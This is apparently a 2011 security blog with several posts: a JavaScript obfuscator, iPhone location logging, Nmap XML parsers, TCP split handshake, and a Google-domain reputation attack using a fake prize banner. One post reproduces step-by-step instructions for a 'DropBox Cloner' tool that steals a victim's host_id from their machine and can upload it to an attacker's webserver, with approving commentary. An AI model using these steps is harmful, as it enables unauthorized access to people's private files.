Saturday, April 30, 2011

Javascript Enkoder

Hi folks,
today I found out this interesting online tool called: Enkoder. Enkoder encodes ( :D ) every HTML code you like. It is based on a dynamic engine able to encode the same code into many different ways. A simple img's tag encoding follows:

By clicking on "Submit" the encoded tag will appear o_0!

Moved into a text file, to see all the encoded tag.

Well, pretty clear for being a simple img tag, right ? :D. For those of you who like reversing javascript it will be fun and challenging. For everyone else it is a great way to hide your code.

I think it's one of the best javascript obfuscators I've seen so far. Enjoy it !

Tuesday, April 26, 2011

iPhone Tracker

Hi Folks,
during these past days many posts on the iPhone "discovery" (geo-location recording) has been discussed. I think this is important and for this reason I want keeping track of it. iPhone keeps record of everywhere you go it's the main article on the topic, where you can find links and directions for further researches. In few words security researchers have discovered that Apple's iPhone keeps track of where you go – and saves every detail of it to a secret file on the device which is then copied to the owner's computer when the two are synchronised. The file contains the latitude and longitude of the phone's recorded coordinates along with a timestamp, meaning that anyone who stole the phone or the computer could discover details about the owner's movements using a simple program.

A little portion of Map within iPhone tracks

Is Apple storing this information elsewhere?
There’s no evidence that it’s being transmitted beyond your device and any machines you sync it with.

Where are the problems ?
The most immediate problem is that this data is stored in an easily-readable form on your machine. Any other program you run or user with access to your machine can look through it.
The more fundamental problem is that Apple are collecting this information at all. Cell-phone providers collect similar data almost inevitably as part of their operations, but it’s kept behind their firewall. It normally requires a court order to gain access to it, whereas this is available to anyone who can get their hands on your phone or computer.
By passively logging your location without your permission, Apple have made it possible for anyone from a jealous spouse to a private investigator to get a detailed picture of your movements.

Again, Here the application. Have fun.

Wednesday, April 20, 2011

NMAP XML Parser.

Hi Folks,
after a couple of emails on this topic I decided to share some NMAP specific xml parsers. As many of you know through -oX flag it's possible to save NMAP results into a well-structured xml file. But what about the visualization or the manipulation of such a file ?

Many different ways exist:

  • First above others the default NMAP command line supporting style sheets to NMAP output: nmap -A -oX --stylesheet scanreport.xml

  • xsltproc is the first external example. It applies different type of XSLT to the NMAP results in the following way: xsltproc nmap-output.xml -o nmap-output.html

  • Saxon a similart xslt processor. You can try in the following way: java -jar saxon9.jar -s:nmap-output.xml -o:nmap-output.html

  • xalan-java which is an XSLT processor for transforming XML documents into HTML, text, or other XML document types. You can try it in the following way: java -jar xalan.jar -IN nmap-output.xml -OUT nmap-output.html

  • PowerShellScript . This script converts an XML file into a .NET object within properties. Perfect if you need to write a software that keeps as input the NMAP xml output format. For example if you are building your own report software or a NMAP wrapper.

  • NMAP-XML Flat File converts NMAP xml file format into a HTML or EXCEL table. It's written in java and it's pretty "download 'n run". java XMLNMAPReader nmap-output.xmll > OutputFile.[html/xls]

  • PBNJ. Well it does much more that parsing NMAP XML, but for this post it is able to save NMAP xml file into a database.

  • NMAP2DB is a great tool for popolating SQLite databases with NMAP results

  • Ruby Nmap Parser Library. Great library for rubyans providing Ruby interface to Nmap's scan data. It can run Nmap and parse its XML output directly from the scan, parse a file containing the XML data from a separate scan, parse a String of XML data from a scan, or parse XML data from an object via its read() method.
Well, I am pretty sure there are tons of other ways to modify NMAP xml format around Internet, so please feel free to add comments suggesting what is your own way or what is your favorite tool.

Monday, April 18, 2011

TCP Split Handshake

As you've probably heard during these past few days a lot of discussions about the TCP Split Handshake have been made across the security community. I am not writing an opinion post on the topic, since a simple Google search keeps out tons of good articles on that. I am about to suggest the most significative reading on the TCP Split Handshake, already known from scientific community as TCP simultaneous connection. This interesting and well done article is made by the "Macrothink Institute" in 2010. It is available freely here... Have a nice reading !

Monday, April 11, 2011

DropBox Cloner.

Hi Folks,
today I went through this interesting article from Derek Newton. He claims that Dropbox authentication is insecure by design since it uses a very primitive host authentication. He wrote (9 April 2011):

After some testing (modification of data within the config table, etc) it became clear that the Dropbox client uses only the host_id to authenticate. Here’s the problem: the config.db file is completely portable and is *not* tied to the system in any way. This means that if you gain access to a person’s config.db file (or just the host_id), you gain complete access to the person’s Dropbox until such time that the person removes the host from the list of linked devices via the Dropbox web interface. Taking the config.db file, copying it onto another system (you may need to modify the dropbox_path, to a valid path), and then starting the Dropbox client immediately joins that system into the synchronization group without notifying the authorized user, prompting for credentials, or even getting added to the list of linked devices within your Dropbox account (even though the new system has a completely different name) – this appears to be by design. Additionally, the host_id is still valid even after the user changes their Dropbox password (thus a standard remediation step of changing credentials does not resolve this issue).

Searching a little bit more informations on the described attack I came across to an early attack implementation (by Moloch) available through dropbox too ... (ha ha ha).

Clone any Dropbox in 5 Easy Steps thanks to DrobBox-Cloner.
  1. Find a victim machine running Dropbox, insert your USB drive
  2. Run dbClone.exe, data will be saved in a .txt file
  3. On your own computer install the dropbox client and run "dbClone.exe -i"
  4. Paste in the 'hostid' from the .txt file into the 'hostid' prompt, enter /any/ email
  5. Start up the Dropbox client, and sync all the files!!!

But Wait There's More!:
Use -m to upload the email and hostid to your webserver (via GET), for example "dbClone.exe -m" (Note is appends "mothership.php" to the url), example code in /src/mothership.php!

The software is a python script that uses pytoexe libraries to build a standalone PE working pretty well under windows environments. It has been tested on Windows 7, WinXP and Ubunto 10.10, but of course being python based it should run without any big problems on most of the known platforms. Great job guys !

Friday, April 8, 2011

Linux: the first twenty years

Today I am not going to tell you some security tricks, exploits, vulnerabilities or security related stuff, I am just going to share with you this incredible presentation about Linux. For sure it's one of the most amazing presentations I have ever seen ( Yes, I would never forget "RSAnimate"). It captures your attention, it's fun, dynamic, quick, and extremely simple. That's it. Enjoy your show. Via The Linux Foundation .

Friday, April 1, 2011

Google Reputation Attack.

Hi Folks,
today following my previous post: "Google Feature of Bug?" I want to explain my attack on Google reputation. Google has been already warned about this attack ( several days ago, actually I believe even before posting "Google Feature or Bug") I received the bug confirmation and the email saying they are working on this issue. So now I feel free to public it.

Some notes on reputation systems:

A reputation system computes and publishes reputation scores for a set of objects (e.g. service providers, services, goods or entities) within a community or domain, based on a collection of opinions that other entities hold about the objects. The opinions are typically passed as ratings to a reputation center which uses a specific reputation algorithm to dynamically compute the reputation scores based on the received ratings.

Entities in a community use reputation scores for decision making, e.g. whether or not to buy a specific service or good. An object with a high reputation score will normally attract more business that an object with a low reputation score. It is therefore in the interest of objects to have a high reputation score.

Since the collective opinion in a community determines an object's reputation score, reputation systems represent a form of collaborative sanctioning and praising. A low score represents a collaborative sanctioning of an object that the community perceives as having or providing low quality. Similarly, a high score represents a collaborative praising of an object that the community perceives as having or providing high quality. Reputation scores change dynamically as a function of incoming ratings. A high score can quickly be lost if rating entities start providing negative ratings. Similarly, it is possible for an object with a low score to recover and regain a high score.

A good reading regarding the importance of system reputation is here, a great survey regarding attacks and defense of system reputation entitled: "A Survey of Attack and Defense Techniques for Reputation Systems".

After these readings you probably would know that reputation attacks, especially if applied to high reputation systems (like for example Google), might be twice effective:

First. Users who trusting to the attacked domain will fall into attacks as much as the attacked domain is trusted.
Second. The attacked domain will loose reputation as much as users fell into the attack.

An attacker might abuse of the Google reputation (please note the Google logo and the Google domain ) by adding a fake "You-WIN-click here!" banner through the following link (the following link is just an example not the real link I've used to generate screenshots)

The attacked user, trusting the Google's logo and trusting the Google's domain, might think that the crafted banner is real (because Google said: you've just won) and he might click on it.

By clicking on the faked banner the user could be redirected to a malicious page as the following image shows.

I want to be clear, this is not a direct XSS attack on Google, but it uses Google as a XSS launcher platform. Basically we are in front of a great example of reputation attack, made by using one of the most trusted domain ever: